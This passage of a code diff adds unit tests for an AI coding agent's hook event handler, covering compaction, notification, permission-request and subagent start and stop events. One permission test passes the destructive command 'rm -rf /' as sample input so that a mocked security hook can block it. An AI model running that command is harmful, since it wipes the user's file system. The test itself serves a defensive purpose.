vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePreCompactEvent( + PreCompactTrigger.Manual, + 'Custom instructions for compaction', + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + trigger: PreCompactTrigger; + custom_instructions: string; + }; + + expect(input.trigger).toBe(PreCompactTrigger.Manual); + expect(input.custom_instructions).toBe( + 'Custom instructions for compaction', + ); + }); + + it('should use empty string for custom_instructions when not provided', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePreCompactEvent(PreCompactTrigger.Auto); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + trigger: PreCompactTrigger; + custom_instructions: string; + }; + + expect(input.trigger).toBe(PreCompactTrigger.Auto); + expect(input.custom_instructions).toBe(''); + }); + + it('should pass trigger as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.firePreCompactEvent(PreCompactTrigger.Manual); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PreCompact, + { trigger: PreCompactTrigger.Manual }, + ); + }); + + it('should handle additionalContext in final output', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + hookSpecificOutput: { + hookEventName: 'PreCompact', + additionalContext: 'Preserve function signatures', + }, + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePreCompactEvent( + PreCompactTrigger.Auto, + ); + + expect(result.success).toBe(true); + expect(result.finalOutput?.hookSpecificOutput).toEqual({ + hookEventName: 'PreCompact', + additionalContext: 'Preserve function signatures', + }); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePreCompactEvent(PreCompactTrigger.Manual); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + + it('should handle errors gracefully', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('PreCompact planner error'); + }); + + const result = await hookEventHandler.firePreCompactEvent( + PreCompactTrigger.Auto, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('PreCompact planner error'); + }); + + it('should handle both trigger types correctly', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + // Test Manual trigger + await hookEventHandler.firePreCompactEvent(PreCompactTrigger.Manual); + let mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + let input = mockCalls[mockCalls.length - 1][2] as { + trigger: PreCompactTrigger; + }; + expect(input.trigger).toBe(PreCompactTrigger.Manual); + + // Test Auto trigger + await hookEventHandler.firePreCompactEvent(PreCompactTrigger.Auto); + mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + input = mockCalls[mockCalls.length - 1][2] as { + trigger: PreCompactTrigger; + }; + expect(input.trigger).toBe(PreCompactTrigger.Auto); + }); + }); + + describe('fireNotificationEvent', () => { + it('should execute hooks for Notification event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireNotificationEvent( + 'Test notification message', + NotificationType.PermissionPrompt, + 'Permission needed', + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.Notification, + { notificationType: 'permission_prompt' }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireNotificationEvent( + 'Qwen Code needs your permission to use Bash', + NotificationType.PermissionPrompt, + 'Permission needed', + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + message: string; + notification_type: string; + title?: string; + }; + + expect(input.message).toBe('Qwen Code needs your permission to use Bash'); + expect(input.notification_type).toBe('permission_prompt'); + expect(input.title).toBe('Permission needed'); + }); + + it('should pass notification_type as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.fireNotificationEvent( + 'Qwen Code is waiting for your input', + NotificationType.IdlePrompt, + 'Waiting for input', + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.Notification, + { notificationType: 'idle_prompt' }, + ); + }); + + it('should handle notification without title', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireNotificationEvent( + 'Authentication successful', + NotificationType.AuthSuccess, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + message: string; + notification_type: string; + title?: string; + }; + + expect(input.message).toBe('Authentication successful'); + expect(input.notification_type).toBe('auth_success'); + expect(input.title).toBeUndefined(); + }); + + it('should handle auth_success notification type', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireNotificationEvent( + 'Authentication successful', + NotificationType.AuthSuccess, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.Notification, + { notificationType: 'auth_success' }, + ); + expect(result.success).toBe(true); + }); + + it('should handle elicitation_dialog notification type', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireNotificationEvent( + 'Dialog shown to user', + NotificationType.ElicitationDialog, + 'Dialog', + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.Notification, + { notificationType: 'elicitation_dialog' }, + ); + expect(result.success).toBe(true); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireNotificationEvent( + 'Test notification', + NotificationType.PermissionPrompt, + ); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + + it('should handle errors gracefully', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('Notification planner error'); + }); + + const result = await hookEventHandler.fireNotificationEvent( + 'Test notification', + NotificationType.PermissionPrompt, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('Notification planner error'); + }); + + it('should handle all notification types correctly', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + // Test permission_prompt + await hookEventHandler.fireNotificationEvent( + 'Permission needed', + NotificationType.PermissionPrompt, + ); + let mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + let input = mockCalls[mockCalls.length - 1][2] as { + notification_type: string; + }; + expect(input.notification_type).toBe('permission_prompt'); + + // Test idle_prompt + await hookEventHandler.fireNotificationEvent( + 'Waiting for input', + NotificationType.IdlePrompt, + ); + mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + input = mockCalls[mockCalls.length - 1][2] as { + notification_type: string; + }; + expect(input.notification_type).toBe('idle_prompt'); + + // Test auth_success + await hookEventHandler.fireNotificationEvent( + 'Authentication successful', + NotificationType.AuthSuccess, + ); + mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + input = mockCalls[mockCalls.length - 1][2] as { + notification_type: string; + }; + expect(input.notification_type).toBe('auth_success'); + + // Test elicitation_dialog + await hookEventHandler.fireNotificationEvent( + 'Dialog shown', + NotificationType.ElicitationDialog, + ); + mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + input = mockCalls[mockCalls.length - 1][2] as { + notification_type: string; + }; + expect(input.notification_type).toBe('elicitation_dialog'); + }); + }); + + describe('firePermissionRequestEvent', () => { + it('should execute hooks for PermissionRequest event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'ls -la' }, + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PermissionRequest, + { toolName: 'Bash' }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePermissionRequestEvent( + 'Write', + { file_path: '/test.txt', content: 'hello' }, + PermissionMode.Yolo, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + tool_name: string; + tool_input: Record; + permission_suggestions: PermissionSuggestion[]; + }; + + expect(input.permission_mode).toBe(PermissionMode.Yolo); + expect(input.tool_name).toBe('Write'); + expect(input.tool_input).toEqual({ + file_path: '/test.txt', + content: 'hello', + }); + expect(input.permission_suggestions).toBeUndefined(); + }); + + it('should include permission_suggestions when provided', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const suggestions: PermissionSuggestion[] = [ + { type: 'toolAlwaysAllow', tool: 'Bash' }, + ]; + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'npm test' }, + PermissionMode.Default, + suggestions, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_suggestions: PermissionSuggestion[]; + }; + + expect(input.permission_suggestions).toEqual(suggestions); + }); + + it('should pass tool name as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.firePermissionRequestEvent( + 'ReadFile', + { file_path: '/test.txt' }, + PermissionMode.Plan, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PermissionRequest, + { toolName: 'ReadFile' }, + ); + }); + + it('should handle decision block in final output', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + decision: 'block', + reason: 'Dangerous command detected', + hookSpecificOutput: { + hookEventName: 'PermissionRequest', + decision: { + behavior: 'deny', + message: 'Destructive system command blocked by security hook', + interrupt: true, + }, + }, + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'rm -rf /' }, + PermissionMode.Default, + ); + + expect(result.success).toBe(true); + expect(result.finalOutput?.decision).toBe('block'); + expect(result.finalOutput?.reason).toBe('Dangerous command detected'); + }); + + it('should handle allow decision with updatedInput', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + hookSpecificOutput: { + hookEventName: 'PermissionRequest', + decision: { + behavior: 'allow', + updatedInput: { command: 'npm install --dry-run' }, + }, + }, + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'npm install' }, + PermissionMode.Default, + ); + + expect(result.success).toBe(true); + expect(result.finalOutput?.hookSpecificOutput).toEqual({ + hookEventName: 'PermissionRequest', + decision: { + behavior: 'allow', + updatedInput: { command: 'npm install --dry-run' }, + }, + }); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'ls' }, + PermissionMode.Default, + ); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + + it('should handle errors gracefully', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('PermissionRequest planner error'); + }); + + const result = await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Default, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('PermissionRequest planner error'); + }); + + it('should handle all permission modes correctly', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + // Test Default mode + await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Default, + ); + let mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + let input = mockCalls[mockCalls.length - 1][2] as { + permission_mode: PermissionMode; + }; + expect(input.permission_mode).toBe(PermissionMode.Default); + + // Test Plan mode + await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Plan, + ); + mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + input = mockCalls[mockCalls.length - 1][2] as { + permission_mode: PermissionMode; + }; + expect(input.permission_mode).toBe(PermissionMode.Plan); + + // Test Yolo mode + await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Yolo, + ); + mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + input = mockCalls[mockCalls.length - 1][2] as { + permission_mode: PermissionMode; + }; + expect(input.permission_mode).toBe(PermissionMode.Yolo); + }); + }); + + describe('fireSubagentStartEvent', () => { + it('should execute hooks for SubagentStart event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireSubagentStartEvent( + 'agent-123', + 'code-reviewer', + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.SubagentStart, + { agentType: 'code-reviewer' }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSubagentStartEvent( + 'agent-456', + 'qwen-tester', + PermissionMode.Plan, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + agent_id: string; + agent_type: string; + permission_mode: PermissionMode; + hook_event_name: string; + }; + + expect(input.agent_id).toBe('agent-456'); + expect(input.agent_type).toBe('qwen-tester'); + expect(input.permission_mode).toBe(PermissionMode.Plan); + expect(input.hook_event_name).toBe(HookEventName.SubagentStart); + }); + + it('should pass agentType as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.fireSubagentStartEvent( + 'agent-789', + AgentType.Bash, + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.SubagentStart, + { agentType: String(AgentType.Bash) }, + ); + }); + + it('should handle additional context in final output', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + hookSpecificOutput: { + hookEventName: 'SubagentStart', + additionalContext: 'Injected context for subagent', + }, + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireSubagentStartEvent( + 'agent-111', + 'code-reviewer', + PermissionMode.Default, + ); + + expect(result.success).toBe(true); + expect(result.finalOutput?.hookSpecificOutput).toEqual({ + hookEventName: 'SubagentStart', + additionalContext: 'Injected context for subagent', + }); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSubagentStartEvent( + 'agent-seq', + 'code-reviewer', + PermissionMode.Default, + ); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + + it('should handle errors gracefully', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('SubagentStart planner error'); + }); + + const result = await hookEventHandler.fireSubagentStartEvent( + 'agent-err', + 'code-reviewer', + PermissionMode.Default, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('SubagentStart planner error'); + }); + }); + + describe('fireSubagentStopEvent', () => { + it('should execute hooks for SubagentStop event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireSubagentStopEvent( + 'agent-123', + 'code-reviewer', + '/path/to/transcript.jsonl', + 'Final output from subagent', + false, + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.SubagentStop, + { agentType: 'code-reviewer' }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSubagentStopEvent( + 'agent-456', + 'qwen-tester', + '/transcript/path.jsonl', + 'last message from agent', + true, + PermissionMode.Yolo, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + agent_id: string; + agent_type: string; + agent_transcript_path: string; + last_assistant_message: string; + stop_hook_active: boolean; + permission_mode: PermissionMode; + hook_event_name: string; + }; + + expect(input.agent_id).toBe('agent-456'); + expect(input.agent_type).toBe('qwen-tester'); + expect(input.agent_transcript_path).toBe('/transcript/path.jsonl'); + expect(input.last_assistant_message).toBe('last message from agent'); + expect(input.stop_hook_active).toBe(true); + expect(input.permission_mode).toBe(PermissionMode.Yolo); + expect(input.hook_event_name).toBe(HookEventName.SubagentStop); + }); + + it('should pass agentType as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.fireSubagentStopEvent( + 'agent-789', + 'custom-agent', + '/path/transcript.jsonl', + 'output', + false, + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.SubagentStop, + { agentType: 'custom-agent' }, + ); + }); + + it('should handle block decision in final output', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + decision: 'block', + reason: 'Output too short, continue working', + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireSubagentStopEvent( + 'agent-block', + 'code-reviewer', + '/path/transcript.jsonl', + 'short', + false, + PermissionMode.Default, + ); + + expect(result.success).toBe(true); + expect(result.finalOutput?.decision).toBe('block'); + expect(result.finalOutput?.reason).toBe( + 'Output too short, continue working', + ); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSubagentStopEvent( + 'agent-seq', + 'code-reviewer', + '/path/transcript.jsonl', + 'output', + false, + PermissionMode.Default, + ); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + + it('should handle errors gracefully', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('SubagentStop planner error'); + }); + + const result = await hookEventHandler.fireSubagentStopEvent( + 'agent-err', + 'code-reviewer', + '/path/transcript.jsonl', + 'output', + false, + PermissionMode.Default, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('SubagentStop planner error'); + }); + + it('should handle stop_hook_active flag correctly', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + // Test with stop_hook_active = false + await hookEventHandler.fireSubagentStopEvent( + 'agent-1', + 'code-reviewer', + '/path/transcript.jsonl', + 'output', + false, + PermissionMode.Default, + ); + let mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + let input = mockCalls[mockCalls.length - 1][2] as { + stop_hook_active: boolean; + }; + expect(input.stop_hook_active).toBe(false); + + // Test with stop_hook_active = true + await hookEventHandler.fireSubagentStopEvent( + 'agent-2', + 'code-reviewer', + '/path/transcript.jsonl', + 'output', + true, + PermissionMode.Default, + ); + mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + input = mockCalls[mockCalls.length - 1][2] as { + stop_hook_active: boolean; + }; + expect(input.stop_hook_active).toBe(true); + }); }); }); diff --git a/packages/core/src/hooks/hookEventHandler.ts b/packages/core/src/hooks/hookEventHandler.ts index 2fd5f2892..16bc92b4a 100644 --- a/packages/core/src/hooks/hookEventHandler.ts +++ b/packages/core/src/hooks/hookEventHandler.ts @@ -15,7 +15,24 @@ import type { HookExecutionResult, UserPromptSubmitInput, StopInput, + SessionStartInput, + SessionEndInput, + SessionStartSource, + SessionEndReason, + AgentType, + PreToolUseInput, + PostToolUseInput, + PostToolUseFailureInput, + PreCompactInput, + PreCompactTrigger, + NotificationInput, + NotificationType, + PermissionRequestInput, + 